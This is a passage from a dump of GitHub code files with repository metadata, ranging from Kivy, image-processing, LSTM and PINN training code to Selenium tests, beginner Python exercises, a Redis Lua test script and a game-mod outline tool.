unselected_color = ColorProperty(\"\")\n\n\tpath_json = StringProperty(\"pallet\")\n\ttheme_json = ObjectProperty(None)\n\n\troot_path = StringProperty(\"\")\n\n\ticon_path = StringProperty(\"assets/icons\")\n\n\timage_path = StringProperty(\"assets/images\")\n\n\tfont_path = StringProperty(\"fonts\")\n\n\n\t_app_file = StringProperty(os.path.split(__file__)[0])\n\n\tdef __init__(self, *args, **kwargs):\n\t\t# Set all color properties on the App according to `colors.PALLET_KEY_COLORS` \n\t\tfor _key in colors.PALLET_KEY_COLORS:\n\t\t\tcolor = getattr(colors.Light, _key)\n\t\t\tself.apply_property(\n\t\t\t\t**{ _key : ColorProperty(color) }\n\t\t\t)\n\t\t\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef get_json(self, name, path=None, *args):\n\t\tif path == None:\n\t\t\tpath = self.path_json\n\n\t\twith open(self.get_path(f\"{path}/{name}.json\"), 'r', encoding='utf-8') as file:\n\t\t\treturn json.load(file)\n\n\n\tdef update_json(self, new_json, name, path=None):\n\t\tif path == None:\n\t\t\tpath = self.path_json\n\t\t\n\t\twith open(self.get_path(f\"{path}/{name}.json\"), 'w', encoding='utf-8') as file:\n\t\t\tfile.write(json.dumps(new_json, indent=4))\n\n\tdef on_theme_json(self, *args):\n\t\tif isinstance(self.theme_json, str):\n\t\t\tjson_dict = self.get_json(self.theme_json)\n\t\t\n\t\telif isinstance(self.theme_json, dict):\n\t\t\tjson_dict = self.theme_json\n\t\t\n\t\tpath = do_correction_path(self._app_file)\n\t\tdefault_json = self.get_json(\"default_json_theme\", path)\n\t\t\n\t\tfor key, value in json_dict.items():\n\t\t\tif key not in default_json:\n\t\t\t\traise TypeError(\"Json theme has a nonexistent key!\")\n\t\t\t\n\t\t\tif isinstance(value, str):\n\t\t\t\tsetattr(self, key, get_color_from_hex(value))\n\t\t\telse:\n\t\t\t\tsetattr(self, key, value)\n\n\tdef on_root_path(self, *args):\n\t\tself.root_path = do_correction_path(self.root_path)\n\n\n\tdef 
get_icon(self, name, ext='png'):\n\t\treturn self.get_path(f'{self.icon_path}/{name}.{ext}')\n\t\n\n\tdef get_image(self, name, ext='png'):\n\t\treturn self.get_path(f'{self.image_path}/{name}.{ext}')\n\n\n\tdef get_font(self, path, name, ext=\"ttf\"):\n\t\treturn self.get_path(f'{self.font_path}/{path}/{name}.{ext}')\n\n\n\tdef get_path(self, local, root_path=None):\n\t\tif root_path == None:\n\t\t\troot_path = self.root_path\n\t\t\t\n\t\treturn f'{root_path}/{do_correction_path(local)}'\n\n\tdef change_pallet(self, _obj):\n\t\tif isinstance(_obj, dict):\n\t\t\treturn None\n\t\t\n\t\tfor key in colors.PALLET_KEY_COLORS:\n\t\t\tif hasattr(_obj, key):\n\t\t\t\tsetattr(self, key, getattr(_obj, key))\n","repo_name":"iOsnaaente/Integrador","sub_path":"libs/kivygo/kivygo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41154473398","text":"from PyQt5 import QtWidgets, QtCore, uic, QtGui, QtPrintSupport\r\nfrom pyqtgraph import PlotWidget, plot\r\nfrom PyQt5.uic import loadUiType\r\nfrom PyQt5.QtWidgets import * \r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtGui import *\r\nfrom os import path\r\nimport pyqtgraph as pg\r\nimport queue as Q\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sys\r\nimport os\r\nfrom PIL import Image\r\nfrom PyQt5.QtGui import QPixmap\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nclass ImageModel():\r\n    def __init__(self, imgPath: str,id):\r\n        self.imgPath = imgPath\r\n        self.img = cv2.imread(self.imgPath, flags=cv2.IMREAD_GRAYSCALE).T\r\n        self.imgShape = self.img.shape\r\n        self.fourier = np.fft.fft2(self.img)\r\n        self.real = np.real(self.fourier)\r\n        self.imaginary = np.imag(self.fourier)\r\n        self.magnitude = np.abs(self.fourier)\r\n        self.mag_spectrum = np.log10(self.magnitude)\r\n        self.phase = np.angle(self.fourier)\r\n        self.uniformMagnitude = np.ones(self.img.shape)\r\n        self.uniformPhase = np.zeros(self.img.shape)\r\n        self.component_list=[self.mag_spectrum,self.phase,self.real,self.imaginary]\r\n\r\n    def mix(self, imageToBeMixed, magnitudeOrRealRatio, phaesOrImaginaryRatio , image1_component , image2_component):\r\n        weight_img1 = magnitudeOrRealRatio\r\n        weight_img2 = phaesOrImaginaryRatio\r\n        mixInverse = None\r\n\r\n        Magnitude1 = self.magnitude\r\n        Magnitude2 = imageToBeMixed.magnitude\r\n\r\n        Phase1 = self.phase\r\n        Phase2 = imageToBeMixed.phase\r\n\r\n        Real1 = self.real\r\n        Real2 = imageToBeMixed.real\r\n\r\n        Imaginary1 = self.imaginary\r\n        Imaginary2 = imageToBeMixed.imaginary\r\n\r\n        if image1_component in ('Real', 'Imaginary') : \r\n\r\n            if image1_component == 'Real' : \r\n                \r\n                realMix = weight_img1*Real1 + (1-weight_img1)*Real2\r\n                imaginaryMix = (1-weight_img2)*Imaginary1 + weight_img2*Imaginary2\r\n                \r\n            else :\r\n                realMix = (1-weight_img2)*Real1 + weight_img2*Real2\r\n                imaginaryMix = weight_img1*Imaginary1+(1-weight_img1)*Imaginary2\r\n\r\n            combined = realMix + imaginaryMix * 1j\r\n\r\n        else:\r\n            if image1_component == 'Magnitude' : \r\n                magnitudeMix = weight_img1*Magnitude1 + (1-weight_img1)*Magnitude2\r\n\r\n            elif image1_component == 'Phase' :\r\n                phaseMix = weight_img1*Phase1 + (1-weight_img1)*Phase2\r\n\r\n            elif image2_component == 'Phase' : \r\n                phaseMix = (1-weight_img2)*Phase1 + weight_img2*Phase2\r\n\r\n            elif image2_component == 'Magnitude' :\r\n                magnitudeMix= (1-weight_img2)*Magnitude1 + weight_img2*Magnitude2\r\n\r\n            elif 'UniMagnitude' in (image1_component, image2_component) :\r\n                
Magnitude1 = self.uniformMagnitude\r\n                magnitudeMix = Magnitude1\r\n\r\n            elif 'UniPhase' in (image1_component, image2_component) :\r\n                Phase1 = self.uniformPhase\r\n                phaseMix = Phase1 \r\n\r\n            combined = np.multiply(magnitudeMix, np.exp(1j * phaseMix))\r\n        \r\n        mixInverse = np.real(np.fft.ifft2(combined))\r\n\r\n        return abs(mixInverse)","repo_name":"Noura-Mahmoud/Mixing_images","sub_path":"ImageModel.py","file_name":"ImageModel.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"23872436495","text":"from typing import Dict, List\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Map characters to indices (for use in nn.Embedding)\ncharacters = [' ', \"'\", '0', '1', '2',\n              '3', '4', '5', '6', '7',\n              '8', '9', 'a', 'b', 'c',\n              'd', 'e', 'f', 'g', 'h',\n              'i', 'j', 'k', 'l', 'm',\n              'n', 'o', 'p', 'q', 'r',\n              's', 't', 'u', 'v', 'w',\n              'x', 'y', 'z']\n\nchar_dict = {v: k + 1 for k, v in enumerate(characters)}\n\n\ndef encode_string(s: str, char_dict=char_dict) -> torch.LongTensor:\n    unknown = len(char_dict) + 1\n    idxs = torch.LongTensor([char_dict.get(c, unknown) for c in s])\n    return idxs\n\n\nclass LSTMNetwork(nn.Module):\n    def __init__(self,\n                 chars: Dict[str, int] = char_dict,\n                 emb_dim: int = 20,\n                 hidden_size: int = 100,\n                 num_layers: int = 1,\n                 dropout: float = 0.0,\n                 proj_size: int = 0):\n        super(LSTMNetwork, self).__init__()\n        self.chars = chars\n        self.hidden_size = hidden_size\n        self.emb = nn.Embedding(len(self.chars) + 2, emb_dim)\n        self.LSTM = nn.LSTM(input_size=emb_dim,\n                            hidden_size=self.hidden_size,\n                            num_layers=num_layers,\n                            bidirectional=True,\n                            dropout=dropout,\n                            proj_size=proj_size)\n\n    def emb_packed_sequence(self, packed_sequence):\n        return torch.nn.utils.rnn.PackedSequence(\n            self.emb(packed_sequence.data),\n            packed_sequence.batch_sizes\n        )\n\n    def forward(self, x: List[str]):\n        # Encode the text according to the character dictionary\n        encoded = [encode_string(el) for el in x]\n        text_lengths = np.array([len(el) for el in x])\n\n        # add padding + pack the sequences\n        padded_encoded = torch.nn.utils.rnn.pad_sequence(encoded).to(device)\n        packed_encoded = torch.nn.utils.rnn.pack_padded_sequence(\n            padded_encoded, text_lengths)\n\n        # pass through the embedding layer and the LSTM\n        packed_emb = self.emb_packed_sequence(packed_encoded)\n        packed_lstm_output, _ = self.LSTM(packed_emb)\n        output, _ = torch.nn.utils.rnn.pad_packed_sequence(packed_lstm_output)\n\n        # assemble the text representation, taking the original text lengths into account\n        fwd_state = output[text_lengths - 1,\n                           range(len(text_lengths)),\n                           :self.hidden_size]\n        rev_state = output[0, :, self.hidden_size:]\n        output = torch.cat((fwd_state, rev_state), 1)\n\n        return output\n","repo_name":"PetrovitchSharp/DL_CNM_23","sub_path":"src/models/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12880684928","text":"import logging\n\nimport uvicorn\n\nfrom my_web_framework.api import SomeAPI\nfrom my_web_framework.controller import BaseController, get\n\nlogger = logging.getLogger()\n\n\nclass NameController(BaseController):\n    @get(\"/names/{name}\")\n    async def get(self, name: str):\n        logger.info(\"Hello world\")\n        return f\"Hello {name}!\"\n\n\napi = SomeAPI(title=\"Some API\", 
version=\"2023\")\napi.mount(NameController())\n\nif __name__ == \"__main__\":\n uvicorn.run(api, port=5000, log_level=\"debug\")\n","repo_name":"inikolaev/my-web-framework","sub_path":"my_web_framework/examples/01-simple.py","file_name":"01-simple.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5247756033","text":"courses = ['History', 'chemistry', 'compSci', 'Geography', 'math']\n\n# Slice method in python\nprint(courses[0:4])\n\n\n# Append Method\ncourses.append('Economics')\n\nhigherCourses = ['DeepLearning', 'Machine Learning', 'Neural Network', 'CNN', 'RNN']\n\ncourses.extend(higherCourses)\n\ncourses.remove('CNN')\n\ncourses.append('Scikit Learn')\n\n\ncourses.insert(0, 'Reinforcement Learning')\n\ncourses.pop()\n\ndeletedCourse = courses.pop()\n\nprint(deletedCourse)\n\ncourses.sort()\nprint(courses)\n\n\n\n\n\n","repo_name":"sheddy20/My-python-projects","sub_path":"List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4640932388","text":"#Setler indekslenemez ve sıralanamaz\nmeyveler={\"elma\",\"kiraz\",\"kavun\",\"üzüm\"}\nsebzeler={\"bezelye\",\"soğan\"}\n\nsonuc= \"elma\" in meyveler\n\nmeyveler.add(\"karpuz\")\n\nmeyveler.update([\"vişne\",\"muz\",\"kavun\"])\n\nmeyveler.remove(\"karpuz\")\n\nmeyveler.pop()#her çalıştırmada farklı meyve silinir\n\n#meyveler.clear()\n\nsonuc=meyveler.union(sebzeler)\nsonuc=meyveler\n\n\n\n#print(sonuc)\n\n","repo_name":"yekham/PythonTutorial_tr","sub_path":"VeriYapıları/sets.py","file_name":"sets.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25668457948","text":"from chinese_text_splitter import ChineseTextSplitter\nfrom langchain.document_loaders import UnstructuredFileLoader, TextLoader, CSVLoader\n\nfrom zh_title_enhance import zh_title_enhance\nfrom pdf_loader import UnstructuredPaddlePDFLoader\nimport os\n\n\ndef load_file(filepath, sentence_size=100, using_zh_title_enhance=True):\n\n if filepath.lower().endswith(\".md\"):\n loader = UnstructuredFileLoader(filepath, mode=\"elements\")\n docs = loader.load()\n elif filepath.lower().endswith(\".txt\"):\n loader = TextLoader(filepath, autodetect_encoding=True)\n textsplitter = ChineseTextSplitter(pdf=False, sentence_size=sentence_size)\n docs = loader.load_and_split(textsplitter)\n elif filepath.lower().endswith(\".pdf\"):\n # 暂且将paddle相关的loader改为动态加载,可以在不上传pdf/image知识文件的前提下使用protobuf=4.x\n loader = UnstructuredPaddlePDFLoader(filepath)\n textsplitter = ChineseTextSplitter(pdf=True, sentence_size=sentence_size)\n docs = loader.load_and_split(textsplitter)\n else:\n loader = UnstructuredFileLoader(filepath, mode=\"elements\")\n textsplitter = ChineseTextSplitter(pdf=False, sentence_size=sentence_size)\n docs = loader.load_and_split(text_splitter=textsplitter)\n if using_zh_title_enhance:\n docs = zh_title_enhance(docs)\n write_check_file(filepath, docs)\n return docs\n\ndef write_check_file(filepath, docs):\n folder_path = os.path.join(os.path.dirname(filepath), \"tmp_files\")\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n fp = os.path.join(folder_path, 'load_file.txt')\n with open(fp, 'a+', encoding='utf-8') as fout:\n fout.write(\"filepath=%s,len=%s\" % (filepath, len(docs)))\n fout.write('\\n')\n for i in docs:\n fout.write(str(i))\n 
fout.write('\\n')\n\nload_file(\"/Users/zhucanxiang/Desktop/psy_resources/icd-11.pdf\", 100, True)","repo_name":"zhucanxiang/psyTools","sub_path":"loader/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"20720652175","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport redis\nimport struct\nimport json\nimport sys\n\nsys.path.append(\"./\")\n\ndef invite(lua_script):\n    keys = []\n    args = [100, 101, 'mnick', 'micon', 200, 201, 'snick', 'sicon', 123456]\n\n    reply = []\n    reply = lua_script(keys, args)\n\n    print(\"invite res:%s\" % reply)\n\ndef cancel(lua_script):\n    keys = []\n    args = [100, 200]\n\n    reply = []\n    reply = lua_script(keys, args)\n\n    print(\"cancel res:%s\" % reply)\n\ncall_function = {'invite' : invite, 'cancel' : cancel}\n\nredis_config = {'host': '1.1.1.1',\n                'port': 6000,\n                'password': ''\n}\n\n# 'clear' is handled directly in main() before call_function is consulted\nOPT = ['invite', 'cancel', 'clear']\n\ndef check_param(argv):\n    argc = len(argv)\n    if argc < 2:\n        return False\n    \n    if argv[1] not in OPT:\n        return False\n    return True\n    \ndef main():\n    if not check_param(sys.argv):\n        print(\"invalid args \\n\")\n        return None\n\n    cmd = sys.argv[1]\n    print(\"cmd : %s\\n\" % cmd)\n    \n    r = redis.Redis(redis_config['host'], redis_config['port'], 0, redis_config['password'])\n\n    if cmd == 'clear':\n        r.delete('#testkey')\n        print(\"%s succ\\n\" % cmd)\n        return None\n    \n    # load the lua script\n    lua_file = cmd + '.lua'\n    with open(lua_file, 'rb') as f:\n        test_lua = f.read()\n    lua_script = r.register_script(test_lua)\n\n    call_function[cmd](lua_script)\n\nif __name__ == \"__main__\":\n    main()\n\n","repo_name":"logosky/python","sub_path":"tools/test_lua.py","file_name":"test_lua.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16562038701","text":"#Exercise 6.6\n'''Write a function that receives two parameters: the diameter of a round pizza in centimeters and\n    the price of the pizza in euros. 
The function calculates and returns the unit price of the pizza per square meter.\n    The main program asks the user to enter the diameter and price of two pizzas and tells the user which pizza provides\n    better value for money (which of them has a lower unit price).\n    You must use the function you wrote for calculating the unit prices.'''\nimport math\n\ndef price_per_meter(diameter, price):\n    area = round(math.pi * (diameter / 100) ** 2 / 4, 4)  # circle area in square meters; diameter is given in cm\n    unit_price = price/area\n    print (\"The price of this pizza per square meter is: \" ,round(unit_price,4), \"euro\\n\")\n    return unit_price\n\n\nfirst_pizza_diameter = int(input(\"Enter the diameter of the first pizza: \"))\nfirst_pizza_price = int(input(\"Enter the price of the first pizza: \"))\nfirst_pizza_value = price_per_meter(first_pizza_diameter,first_pizza_price)\n\nsecond_pizza_diameter = int(input(\"Enter the diameter of the second pizza: \"))\nsecond_pizza_price = int(input(\"Enter the price of the second pizza: \"))\nsecond_pizza_value = price_per_meter(second_pizza_diameter,second_pizza_price)\n\nif (first_pizza_value<second_pizza_value):\n    print(\"The first pizza is cheaper than the second pizza.\")\nelif(first_pizza_value>second_pizza_value):\n    print(\"The second pizza is cheaper than the first pizza.\")\nelif(first_pizza_value==second_pizza_value):\n    print(\"The price is the same\")","repo_name":"AnnaLinden/Metropolia_Python_Assignments","sub_path":"ExerciseSet6/Exercise 6.6.py","file_name":"Exercise 6.6.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"28619347777","text":"#\n# @lc app=leetcode id=216 lang=python3\n#\n# [216] Combination Sum III\n#\n\n# @lc code=start\nclass Solution:\n    def combinationSum3(self, k: int, n: int) -> List[List[int]]:\n        res = []\n        def dfs(target, start, path):\n            len_path = len(path)\n            if target < 0 or len_path > k: return\n            if len_path == k and target == 0:\n                res.append(path)\n                return\n            for i in range(start, 10):\n                dfs(target - i, i + 1, path + [i])\n        dfs(n, 1, [])\n        return res\n\n\n    \n# @lc code=end\n\n","repo_name":"Anderbone/leetcode","sub_path":"Python/216.combination-sum-iii.py","file_name":"216.combination-sum-iii.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73841000231","text":"import simple_draw as sd\r\n\r\n#\r\n# colors = {\r\n#     \"white\": sd.COLOR_WHITE,\r\n#     \"black\": sd.COLOR_BLACK,\r\n#     \"red\": sd.COLOR_RED,\r\n#     \"orange\": sd.COLOR_ORANGE,\r\n#     \"yellow\": sd.COLOR_YELLOW,\r\n#     \"green\": sd.COLOR_GREEN,\r\n#     \"cyan\": sd.COLOR_CYAN,\r\n#     \"blue\": sd.COLOR_BLUE,\r\n#     \"purple\": sd.COLOR_PURPLE,\r\n#     \"dark orange\": sd.COLOR_DARK_ORANGE\r\n# }\r\n\r\n_colors = (sd.COLOR_RED, sd.COLOR_ORANGE, sd.COLOR_YELLOW, sd.COLOR_GREEN,\r\n           sd.COLOR_CYAN, sd.COLOR_BLUE, sd.COLOR_PURPLE)\r\n\r\nblink_index = 0\r\n\r\n\r\ndef smile(center_point, color, width):\r\n    # head\r\n    radius = 50\r\n    sd.circle(center_position=center_point, radius=radius, color=color, width=width)\r\n\r\n    # left eye\r\n    point = sd.get_point(x=center_point.x - 20, y=center_point.y + 10)\r\n    radius = 5\r\n    sd.circle(center_position=point, radius=radius, color=color, width=width)\r\n\r\n    # right eye\r\n    point = sd.get_point(x=center_point.x + 20, y=center_point.y + 10)\r\n    radius = 5\r\n    sd.circle(center_position=point, radius=radius, color=color, width=width)\r\n\r\n    # smile (mouth)\r\n    point_1 = sd.get_point(x=center_point.x - 25, y=center_point.y - 15)\r\n    point_2 = sd.get_point(x=center_point.x - 15, y=center_point.y - 20)\r\n    point_3 = 
sd.get_point(x=center_point.x + 15, y=center_point.y - 20)\r\n point_4 = sd.get_point(x=center_point.x + 30, y=center_point.y - 15)\r\n point_list = point_1, point_2, point_3, point_4\r\n sd.lines(point_list=point_list, color=color, closed=False, width=width)\r\n\r\n\r\ndef smile_blinks(center_point):\r\n global blink_index\r\n # smile(center_point=center_point, color=color, width=5)\r\n smile(center_point=center_point, color=_colors[blink_index], width=5)\r\n blink_index += 1\r\n if blink_index == len(_colors):\r\n blink_index = 0\r\n","repo_name":"esurkova90/practicing","sub_path":"village/smile.py","file_name":"smile.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71128574313","text":"import os\n\nimport pandas as pd\n\nfrom joblib import load\nfrom datetime import datetime\nfrom data_api import find_additional_info\n\n\ndef get_input():\n while True:\n lat, long = input(\"Enter coordinates (e.g: 33.205317, -97.153130): \").split(',')\n lat, long = float(lat), float(long)\n if isinstance(lat, (float, int)) and isinstance(long, (float, int)):\n break\n else:\n print(\"Invalid coordinate pair, please reenter.\")\n\n day = None\n\n check = input(\"Would you like to use the current time? (y/n): \")\n if check.lower() == 'n':\n while True:\n day = input(\"Please enter date (DD/MM/YYYY): \")\n try:\n day = datetime.strptime(day, '%d/%m/%Y')\n break\n except ValueError:\n print(\"Invalid input, please try again.\")\n return lat, long, day\n\n\ndef input_process():\n input_data = get_input()\n data_dict = find_additional_info(*input_data)\n df = pd.DataFrame(data_dict, index=[0])\n\n features = [\"Hour\", \"Weekend\", \"Month\", \"radius_in_miles\", \"population\",\n \"population_density\", \"land_area_in_sqmi\", \"water_area_in_sqmi\",\n \"housing_units\", \"occupied_housing_units\", \"median_home_value\",\n \"median_household_income\", \"temp\", \"dwpt\", \"rhum\", \"prcp\",\n \"wdir\", \"wspd\", \"pres\", \"coco\"]\n return df[features]\n\n\ndef load_models():\n models = {}\n for root, dirs, files in os.walk(\"../notebooks/model_cache\", topdown=False):\n for name in files:\n model_path = os.path.join(root, name)\n print(f\"Loading: {model_path}\")\n models[name.split('.')[0]] = load(model_path)\n print(\"Done.\")\n return models\n\n\ndef make_inference(model, input_data):\n percentiles = ['P20', 'P40', 'P50', 'P60', 'P80']\n print('\\n############################')\n print(f'Predicting with {str(model[\"regr\"])}:')\n print('Wait expected')\n preds = model[\"model\"].predict(input_data)[0]\n for i in range(len(preds)):\n print(f'\\t{percentiles[i]}: {round(preds[i])} s.')\n print('############################\\n')\n\n\ndef main():\n input_data = input_process()\n model_dict = load_models()\n for model in model_dict:\n make_inference(model_dict[model], input_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"caseyeaster39/5215project","sub_path":"scripts/wait_time.py","file_name":"wait_time.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8506244500","text":"import tensorflow as tf\n\nimport numpy as np\nimport pandas as pd\n\nfrom model import create_model\n\nif __name__ == \"__main__\":\n # --------------------------------------------------------------------------\n # preliminaries\n myDtype = 'float32'\n\n a0 = 0.005 # initial crack length [m]\n m = 3.8 # Paris 
model exponent\n C = 1.5E-11 # Paris model constant\n\n # --------------------------------------------------------------------------\n # fleet information\n df = pd.read_csv('aFleet_5yrs.csv', index_col=None, dtype=myDtype)\n aFleet = np.asarray(df)\n\n df = pd.read_csv('SFleet_5yrs.csv', index_col=None, dtype=myDtype)\n SFleet = np.transpose(np.asarray(df))\n nFleet, nCycles = SFleet.shape\n\n # --------------------------------------------------------------------------\n idx = np.argsort(aFleet[-1, :])\n\n arange = np.asarray(np.linspace(0, 299, 60), dtype=int)\n idxTrain = idx[arange]\n\n Sobs = SFleet[idxTrain, :]\n Sobs = Sobs[:, :, np.newaxis]\n\n batch_input_shape = Sobs.shape\n\n SFleet = SFleet[:, :, np.newaxis]\n\n nObs = Sobs.shape[0]\n\n # --------------------------------------------------------------------------\n aTarget = aFleet[-1, idxTrain]\n aTarget = aTarget[:, np.newaxis]\n\n a0RNN = a0 * np.ones((nObs, 1), dtype=myDtype)\n\n # --------------------------------------------------------------------------\n dkLayer = tf.keras.models.load_model('DK_MLP.h5')\n dkLayer.trainable = True\n\n model = create_model(dkLayer=dkLayer, C=C, m=m,\n batch_input_shape=batch_input_shape, a0RNN=a0RNN, myDtype=myDtype)\n\n # --------------------------------------------------------------------------\n EPOCHS = 5\n jmdDir = \"./training_%d_points\" % len(idxTrain)\n\n weight_path = jmdDir + \"/cp.ckpt\"\n ModelCheckpoint = tf.keras.callbacks.ModelCheckpoint(filepath=weight_path, monitor='loss',\n verbose=1, save_best_only=True,\n mode='min', save_weights_only=True)\n\n callbacks_list = [ModelCheckpoint]\n\n history = model.fit(Sobs, aTarget, epochs=EPOCHS, steps_per_epoch=1, verbose=1, callbacks=callbacks_list)\n\n # --------------------------------------------------------------------------\n df = pd.DataFrame.from_dict(history.history)\n df.insert(loc=0, column='epoch', value=history.epoch)\n df.to_csv(jmdDir + \"/lossHistory.csv\", index=False)\n","repo_name":"PML-UCF/pinn","sub_path":"samples/cumulative_damage/airplane_fleet_crack_growth/run01_train_cumulative_damage.py","file_name":"run01_train_cumulative_damage.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","stars":183,"dataset":"github-code","pt":"72"} +{"seq_id":"39900196159","text":"import pytest\nfrom pages.demoqa_check_box_page import DemoqaCheckBoxPage\nimport time\n\n@pytest.mark.usefixtures(\"tc_setup\")\nclass TestCheckBoxCase02:\n def test_check_box_tc_02(self):\n # 01. 
Launch the demoqa website\n        ch_bx_page = DemoqaCheckBoxPage(self.driver)\n        ch_bx_page.page_scroll()\n        ch_bx_page.navigate_to_checkbox_page()\n\n        # 02.Click on Expand all button\n        ch_bx_page.click_on_expand_all()\n        time.sleep(2)\n        # 03.Select the Home checkbox\n        ch_bx_page.select_home_checkbox()\n        time.sleep(2)\n\n        # Verify that the home checkbox is selected\n        ch_bx_page.verify_checkbox_is_selected(DemoqaCheckBoxPage.HOME_CHECKED)\n","repo_name":"MoJoe13/selenium-py-framework","sub_path":"testcases/test_demoqa_02_checkbox_expand_all_and_select_all.py","file_name":"test_demoqa_02_checkbox_expand_all_and_select_all.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30267623757","text":"if __name__ == '__main__':\n    import time\n    import database\n    import twitter\n\n    twitter.tweet_start()\n\n    restricted_users = database.get_restricted_users()\n\n    if (len(restricted_users) > 0):\n        previous_status = twitter.tweet_restricted_start(len(restricted_users))\n        for user in restricted_users:\n            previous_status = twitter.tweet_restricted(user, previous_status)\n    \n    user_ids = database.get_users_that_removed()\n    tweet_total = tweet_count = 0\n\n    for user_id in user_ids:\n        user = database.get_user(user_id)\n        previous_status = twitter.tweet_start_user(user)\n        tweets = database.get_tweets(user_id)\n        for tweet in tweets:\n            previous_status = twitter.tweet_erased(tweet, previous_status)\n            database.update_tweet(tweet)\n            tweet_total += 1\n            tweet_count += 1\n        twitter.tweet_end_user(user, len(tweets), previous_status)\n\n        if tweet_count >= 25:\n            tweet_count = 0\n            time.sleep(3600)\n\n    twitter.tweet_end(tweet_total)","repo_name":"projeto7c0/7c0","sub_path":"tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"74108402471","text":"# Author: SilentNightSound#7430\n# Allows user to set thickness of outlines on model\n# Slightly more powerful than the remove outline script\n\n# Place in Mod folder and run with python genshin_set_outlines.py --thickness t\n# where t is a value between 0 (no outline) and 255 (thick as possible)\n\nimport os\nimport argparse\nimport struct\nimport shutil\nimport json\nimport math\n\ndef main():\n    \n    parser = argparse.ArgumentParser(description=\"Set outline thickness\")\n    parser.add_argument(\"--thickness\", type=int, default=0, help=\"Thickness of outline (0 - no outline, 255 - maximum outline)\")\n    args = parser.parse_args()\n\n    texcoord_file = [x for x in os.listdir(\".\") if \"Texcoord.buf\" in x]\n    if len(texcoord_file) == 0:\n        print(f\"ERROR: unable to find texcoord file. Ensure you are running this in the same folder as CharTexcoord.buf. Exiting\")\n        return\n    if len(texcoord_file) > 1:\n        print(f\"ERROR: more than one texcoord file identified {texcoord_file}. Please remove files until only one remains, then run script again. Exiting\")\n        return\n    texcoord_file = texcoord_file[0]\n\n    ini_file = [x for x in os.listdir(\".\") if \".ini\" in x]\n    if len(ini_file) == 0:\n        print(f\"ERROR: unable to find .ini file. Ensure you are running this in the same folder as Char.ini. Exiting\")\n        return\n    if len(ini_file) > 1:\n        print(f\"ERROR: more than one .ini file identified {ini_file}. Please remove files until only one remains, then run script again. 
Exiting\")\n ini_file = ini_file[0]\n\n with open(ini_file, \"r\") as f:\n stride = int(f.read().split(texcoord_file)[0].split(\"\\n\")[-2].split(\"=\")[1].strip())\n\n print(f\"Texcoord: {texcoord_file}, Ini: {ini_file}, Stride: {stride}\")\n\n with open(texcoord_file, \"rb+\") as f:\n print(\"Removing outlines\")\n data = bytearray(f.read())\n i = 0\n while i < len(data):\n data[i+3] = args.thickness\n i += stride\n\n print(\"Writing results to new file\")\n f.seek(0)\n f.write(data)\n f.truncate()\n\n print(\"All operations complete, exiting\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SilentNightSound/GI-Model-Importer","sub_path":"Tools/genshin_set_outlines.py","file_name":"genshin_set_outlines.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1640,"dataset":"github-code","pt":"72"} +{"seq_id":"13534524490","text":"import lol_model1\nimport lol_model2\nimport numpy as np\n\nhealth = int(input('請輸入敵方血量:'))\narmor = int(input('請輸入敵方物防:'))\nmr = int(input('請輸入敵方魔防:'))\nlv = int(input('請輸入等級:'))\n\ncham = lol_model1.champion(lv, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)\nbot = lol_model2.Enemy(health, armor, mr)\n\n#使用英雄\ncham.Jayce(1)\n\n#寫入裝備 